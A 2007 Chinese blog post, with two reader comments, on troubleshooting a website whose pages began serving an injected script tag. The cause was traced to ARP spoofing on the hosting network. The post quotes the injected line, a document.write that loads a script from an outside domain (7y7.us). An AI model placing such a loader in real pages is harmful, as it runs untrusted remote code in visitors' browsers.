分享、学习、提高
2007/04/23 22:02
文章作者:Enjoy 转载请注明原文链接。
下班回家,打开自己的统计,发现页面上头多了点东西。查看一下源代码,头部多了一句:
document.write('<script src=http://7y7.us/1.js></script>');  

上服务器,查看一下,并无此内容的文件。。。

再看一下服务器上的其它站点,几乎是所有的页面全部被加上了:(包括htm和asp页面,但.shtm和.txt没有。

在搜索引擎中搜索一下,以为是这个问题。

引用

所有网站页面头部出现 <script src=http://7y7.us/2.js></script> 代码,但是实际网页源代码里是没有的

该问题为电信机房网络中的一台服务器中了ARP病毒导致整个网络出现这种状况,电信机房已经予以封锁改服务器。今天终于恢复正常了!


但是咨询了服务提供商,并为发现同网段其它服务器有此问题,得先从自身机子找原因。

再搜索,发现前段时间cnzz和ITSUN也中过此类的毒。

看来是IIS内核程序被改?

先查看应用程序映射,正常。asp的映射程序asp.dll也正常,最后修改日期:2006-4-11 13:34,与我本机的一模一样,排除更改程序映射的怀疑。

卸载IIS,再重装,由于服务器上没有I386目录的文件,碰到一个本机上传一个。。。搞了很久恢复后,发现还是有代码:(

再检查,还是没发现。

0:30,不玩了,睡觉。

8:40,访问网站,恶意代码自己没了。。。再次怀疑真的是机房问题了!
111 Email Homepage
2008/04/11 08:28
你是中了arp病毒,安装个arp防火墙就可以了,
enjoy 回复于 2008/04/14 19:21
恩,是啊!事后就装上ARP防火墙了:)
分页: 1/1 第一页 1 最后页
发表评论
表情
emotemotemotemotemot
打开HTML
打开UBB
打开表情
隐藏
昵称   密码   游客无需密码
网址   电邮   [注册]
               

验证码 不区分大小写